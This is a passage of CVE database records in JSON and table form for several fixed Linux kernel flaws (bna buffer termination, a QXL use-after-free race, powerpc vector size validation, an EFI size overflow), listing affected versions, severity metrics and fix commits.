"url": "https://git.kernel.org/stable/c/d49270a04623ce3c0afddbf3e984cb245aa48e9c"
}
],
"title": "pstore/ram: Fix crash when setting number of cpus to an odd number",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2023-52619",
"datePublished": "2024-03-18T10:19:05.854Z",
"dateReserved": "2024-03-06T09:52:12.089Z",
"dateUpdated": "2025-05-04T07:40:01.100Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-36934 (GCVE-0-2024-36934)
Vulnerability from cvelistv5
Published
2024-05-30 15:29
Modified
2025-05-04 09:12
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
bna: ensure the copied buf is NUL terminated
Currently, we allocate a nbytes-sized kernel buffer and copy nbytes from
userspace to that buffer. Later, we use sscanf on this buffer but we don't
ensure that the string is terminated inside the buffer, this can lead to
OOB read when using sscanf. Fix this issue by using memdup_user_nul
instead of memdup_user.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 7afc5dbde09104b023ce04465ba71aaba0fc4346 Version: 7afc5dbde09104b023ce04465ba71aaba0fc4346 Version: 7afc5dbde09104b023ce04465ba71aaba0fc4346 Version: 7afc5dbde09104b023ce04465ba71aaba0fc4346 Version: 7afc5dbde09104b023ce04465ba71aaba0fc4346 Version: 7afc5dbde09104b023ce04465ba71aaba0fc4346 Version: 7afc5dbde09104b023ce04465ba71aaba0fc4346 Version: 7afc5dbde09104b023ce04465ba71aaba0fc4346 |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-09-12T16:03:00.779Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/bd502ba81cd1d515deddad7dbc6b812b14b97147"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/80578ec10335bc15ac35fd1703c22aab34e39fdd"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6f0f19b79c085cc891c418b768f26f7004bd51a4"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/0f560240b4cc25d3de527deb257cdf072c0102a9"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/06cb37e2ba6441888f24566a997481d4197b4e32"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e19478763154674c084defc62ae0d64d79657f91"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/1518b2b498a0109eb6b15755169d3b6607356b35"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8c34096c7fdf272fd4c0c37fe411cd2e3ed0ee9f"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00019.html"
},
{
"url": "https://security.netapp.com/advisory/ntap-20240912-0007/"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-36934",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T17:15:51.492467Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:34:36.842Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/brocade/bna/bnad_debugfs.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "bd502ba81cd1d515deddad7dbc6b812b14b97147",
"status": "affected",
"version": "7afc5dbde09104b023ce04465ba71aaba0fc4346",
"versionType": "git"
},
{
"lessThan": "80578ec10335bc15ac35fd1703c22aab34e39fdd",
"status": "affected",
"version": "7afc5dbde09104b023ce04465ba71aaba0fc4346",
"versionType": "git"
},
{
"lessThan": "6f0f19b79c085cc891c418b768f26f7004bd51a4",
"status": "affected",
"version": "7afc5dbde09104b023ce04465ba71aaba0fc4346",
"versionType": "git"
},
{
"lessThan": "0f560240b4cc25d3de527deb257cdf072c0102a9",
"status": "affected",
"version": "7afc5dbde09104b023ce04465ba71aaba0fc4346",
"versionType": "git"
},
{
"lessThan": "06cb37e2ba6441888f24566a997481d4197b4e32",
"status": "affected",
"version": "7afc5dbde09104b023ce04465ba71aaba0fc4346",
"versionType": "git"
},
{
"lessThan": "e19478763154674c084defc62ae0d64d79657f91",
"status": "affected",
"version": "7afc5dbde09104b023ce04465ba71aaba0fc4346",
"versionType": "git"
},
{
"lessThan": "1518b2b498a0109eb6b15755169d3b6607356b35",
"status": "affected",
"version": "7afc5dbde09104b023ce04465ba71aaba0fc4346",
"versionType": "git"
},
{
"lessThan": "8c34096c7fdf272fd4c0c37fe411cd2e3ed0ee9f",
"status": "affected",
"version": "7afc5dbde09104b023ce04465ba71aaba0fc4346",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/brocade/bna/bnad_debugfs.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "3.3"
},
{
"lessThan": "3.3",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.314",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.276",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.217",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.159",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.91",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.31",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.10",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.314",
"versionStartIncluding": "3.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.276",
"versionStartIncluding": "3.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.217",
"versionStartIncluding": "3.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.159",
"versionStartIncluding": "3.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.91",
"versionStartIncluding": "3.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.31",
"versionStartIncluding": "3.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.10",
"versionStartIncluding": "3.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "3.3",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nbna: ensure the copied buf is NUL terminated\n\nCurrently, we allocate a nbytes-sized kernel buffer and copy nbytes from\nuserspace to that buffer. Later, we use sscanf on this buffer but we don\u0027t\nensure that the string is terminated inside the buffer, this can lead to\nOOB read when using sscanf. Fix this issue by using memdup_user_nul\ninstead of memdup_user."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:12:22.995Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/bd502ba81cd1d515deddad7dbc6b812b14b97147"
},
{
"url": "https://git.kernel.org/stable/c/80578ec10335bc15ac35fd1703c22aab34e39fdd"
},
{
"url": "https://git.kernel.org/stable/c/6f0f19b79c085cc891c418b768f26f7004bd51a4"
},
{
"url": "https://git.kernel.org/stable/c/0f560240b4cc25d3de527deb257cdf072c0102a9"
},
{
"url": "https://git.kernel.org/stable/c/06cb37e2ba6441888f24566a997481d4197b4e32"
},
{
"url": "https://git.kernel.org/stable/c/e19478763154674c084defc62ae0d64d79657f91"
},
{
"url": "https://git.kernel.org/stable/c/1518b2b498a0109eb6b15755169d3b6607356b35"
},
{
"url": "https://git.kernel.org/stable/c/8c34096c7fdf272fd4c0c37fe411cd2e3ed0ee9f"
}
],
"title": "bna: ensure the copied buf is NUL terminated",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-36934",
"datePublished": "2024-05-30T15:29:24.357Z",
"dateReserved": "2024-05-30T15:25:07.071Z",
"dateUpdated": "2025-05-04T09:12:22.995Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-39198 (GCVE-0-2023-39198)
Vulnerability from cvelistv5
Published
2023-11-09 19:15
Modified
2025-11-06 19:47
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- CWE-416 - Use After Free
Summary
A race condition was found in the QXL driver in the Linux kernel. The qxl_mode_dumb_create() function dereferences the qobj returned by the qxl_gem_object_create_with_handle(), but the handle is the only one holding a reference to it. This flaw allows an attacker to guess the returned handle value and trigger a use-after-free issue, potentially leading to a denial of service or privilege escalation.
References
| URL | Tags | ||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||
Impacted products
| Vendor | Product | Version | |||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Red Hat | Red Hat Enterprise Linux 8 |
Unaffected: 0:4.18.0-553.rt7.342.el8_10 < * cpe:/a:redhat:enterprise_linux:8::nfv cpe:/a:redhat:enterprise_linux:8::realtime |
|||||||||||||||||||||||||||||||||||||
|
|||||||||||||||||||||||||||||||||||||||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-39198",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-08-01T03:55:52.570322Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-08-01T13:53:12.378Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T18:02:05.368Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "RHSA-2024:2394",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:2394"
},
{
"name": "RHSA-2024:2950",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:2950"
},
{
"name": "RHSA-2024:3138",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:3138"
},
{
"tags": [
"vdb-entry",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/security/cve/CVE-2023-39198"
},
{
"name": "RHBZ#2218332",
"tags": [
"issue-tracking",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2218332"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00016.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:enterprise_linux:8::nfv",
"cpe:/a:redhat:enterprise_linux:8::realtime"
],
"defaultStatus": "affected",
"packageName": "kernel-rt",
"product": "Red Hat Enterprise Linux 8",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:4.18.0-553.rt7.342.el8_10",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:8::baseos",
"cpe:/a:redhat:enterprise_linux:8::crb"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 8",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:4.18.0-553.el8_10",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:enterprise_linux:9::realtime",
"cpe:/o:redhat:enterprise_linux:9::baseos",
"cpe:/a:redhat:enterprise_linux:9::crb",
"cpe:/a:redhat:enterprise_linux:9::nfv",
"cpe:/a:redhat:enterprise_linux:9::appstream"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:5.14.0-427.13.1.el9_4",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:enterprise_linux:9::realtime",
"cpe:/o:redhat:enterprise_linux:9::baseos",
"cpe:/a:redhat:enterprise_linux:9::crb",
"cpe:/a:redhat:enterprise_linux:9::nfv",
"cpe:/a:redhat:enterprise_linux:9::appstream"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:5.14.0-427.13.1.el9_4",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:6"
],
"defaultStatus": "unknown",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 6",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:7"
],
"defaultStatus": "unknown",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 7",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:7"
],
"defaultStatus": "unknown",
"packageName": "kernel-rt",
"product": "Red Hat Enterprise Linux 7",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:9"
],
"defaultStatus": "affected",
"packageName": "kernel-rt",
"product": "Red Hat Enterprise Linux 9",
"vendor": "Red Hat"
}
],
"datePublic": "2023-08-17T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "A race condition was found in the QXL driver in the Linux kernel. The qxl_mode_dumb_create() function dereferences the qobj returned by the qxl_gem_object_create_with_handle(), but the handle is the only one holding a reference to it. This flaw allows an attacker to guess the returned handle value and trigger a use-after-free issue, potentially leading to a denial of service or privilege escalation."
}
],
"metrics": [
{
"other": {
"content": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"value": "Moderate"
},
"type": "Red Hat severity rating"
}
},
{
"cvssV3_1": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"format": "CVSS"
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-416",
"description": "Use After Free",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-11-06T19:47:48.676Z",
"orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
"shortName": "redhat"
},
"references": [
{
"name": "RHSA-2024:2394",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:2394"
},
{
"name": "RHSA-2024:2950",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:2950"
},
{
"name": "RHSA-2024:3138",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:3138"
},
{
"tags": [
"vdb-entry",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/security/cve/CVE-2023-39198"
},
{
"name": "RHBZ#2218332",
"tags": [
"issue-tracking",
"x_refsource_REDHAT"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2218332"
}
],
"timeline": [
{
"lang": "en",
"time": "2023-06-28T00:00:00+00:00",
"value": "Reported to Red Hat."
},
{
"lang": "en",
"time": "2023-08-17T00:00:00+00:00",
"value": "Made public."
}
],
"title": "Kernel: qxl: race condition leading to use-after-free in qxl_mode_dumb_create()",
"workarounds": [
{
"lang": "en",
"value": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability."
}
],
"x_redhatCweChain": "CWE-362-\u003eCWE-416: Concurrent Execution using Shared Resource with Improper Synchronization (\u0027Race Condition\u0027) leads to Use After Free"
}
},
"cveMetadata": {
"assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
"assignerShortName": "redhat",
"cveId": "CVE-2023-39198",
"datePublished": "2023-11-09T19:15:47.605Z",
"dateReserved": "2023-07-25T17:04:34.810Z",
"dateUpdated": "2025-11-06T19:47:48.676Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2023-52606 (GCVE-0-2023-52606)
Vulnerability from cvelistv5
Published
2024-03-06 06:45
Modified
2025-05-04 07:39
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
powerpc/lib: Validate size for vector operations
Some of the fp/vmx code in sstep.c assume a certain maximum size for the
instructions being emulated. The size of those operations however is
determined separately in analyse_instr().
Add a check to validate the assumption on the maximum size of the
operations, so as to prevent any unintended kernel stack corruption.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-52606",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-03-06T15:40:47.591136Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:22:50.946Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T23:03:21.178Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/42084a428a139f1a429f597d44621e3a18f3e414"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/0580f4403ad33f379eef865c2a6fe94de37febdf"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/beee482cc4c9a6b1dcffb2e190b4fd8782258678"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/de4f5ed63b8a199704d8cdcbf810309d7eb4b36b"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/abd26515d4b767ba48241eea77b28ce0872aef3e"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/28b8ba8eebf26f66d9f2df4ba550b6b3b136082c"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/848e1d7fd710900397e1d0e7584680c1c04e3afd"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8f9abaa6d7de0a70fc68acaedce290c1f96e2e59"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"arch/powerpc/lib/sstep.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "42084a428a139f1a429f597d44621e3a18f3e414",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "0580f4403ad33f379eef865c2a6fe94de37febdf",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "beee482cc4c9a6b1dcffb2e190b4fd8782258678",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "de4f5ed63b8a199704d8cdcbf810309d7eb4b36b",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "abd26515d4b767ba48241eea77b28ce0872aef3e",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "28b8ba8eebf26f66d9f2df4ba550b6b3b136082c",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "848e1d7fd710900397e1d0e7584680c1c04e3afd",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "8f9abaa6d7de0a70fc68acaedce290c1f96e2e59",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"arch/powerpc/lib/sstep.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.307",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.269",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.210",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.149",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.77",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.16",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.4",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.307",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.269",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.210",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.149",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.77",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\npowerpc/lib: Validate size for vector operations\n\nSome of the fp/vmx code in sstep.c assume a certain maximum size for the\ninstructions being emulated. The size of those operations however is\ndetermined separately in analyse_instr().\n\nAdd a check to validate the assumption on the maximum size of the\noperations, so as to prevent any unintended kernel stack corruption."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T07:39:44.691Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/42084a428a139f1a429f597d44621e3a18f3e414"
},
{
"url": "https://git.kernel.org/stable/c/0580f4403ad33f379eef865c2a6fe94de37febdf"
},
{
"url": "https://git.kernel.org/stable/c/beee482cc4c9a6b1dcffb2e190b4fd8782258678"
},
{
"url": "https://git.kernel.org/stable/c/de4f5ed63b8a199704d8cdcbf810309d7eb4b36b"
},
{
"url": "https://git.kernel.org/stable/c/abd26515d4b767ba48241eea77b28ce0872aef3e"
},
{
"url": "https://git.kernel.org/stable/c/28b8ba8eebf26f66d9f2df4ba550b6b3b136082c"
},
{
"url": "https://git.kernel.org/stable/c/848e1d7fd710900397e1d0e7584680c1c04e3afd"
},
{
"url": "https://git.kernel.org/stable/c/8f9abaa6d7de0a70fc68acaedce290c1f96e2e59"
}
],
"title": "powerpc/lib: Validate size for vector operations",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2023-52606",
"datePublished": "2024-03-06T06:45:31.257Z",
"dateReserved": "2024-03-02T21:55:42.573Z",
"dateUpdated": "2025-05-04T07:39:44.691Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26843 (GCVE-0-2024-26843)
Vulnerability from cvelistv5
Published
2024-04-17 10:10
Modified
2025-05-21 09:12
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
efi: runtime: Fix potential overflow of soft-reserved region size
md_size will have been narrowed if we have >= 4GB worth of pages in a
soft-reserved region.
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 16993c0f0a43213e23666ea40e9163887f593ac7 Version: 16993c0f0a43213e23666ea40e9163887f593ac7 Version: 16993c0f0a43213e23666ea40e9163887f593ac7 Version: 16993c0f0a43213e23666ea40e9163887f593ac7 Version: 16993c0f0a43213e23666ea40e9163887f593ac7 Version: 16993c0f0a43213e23666ea40e9163887f593ac7 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
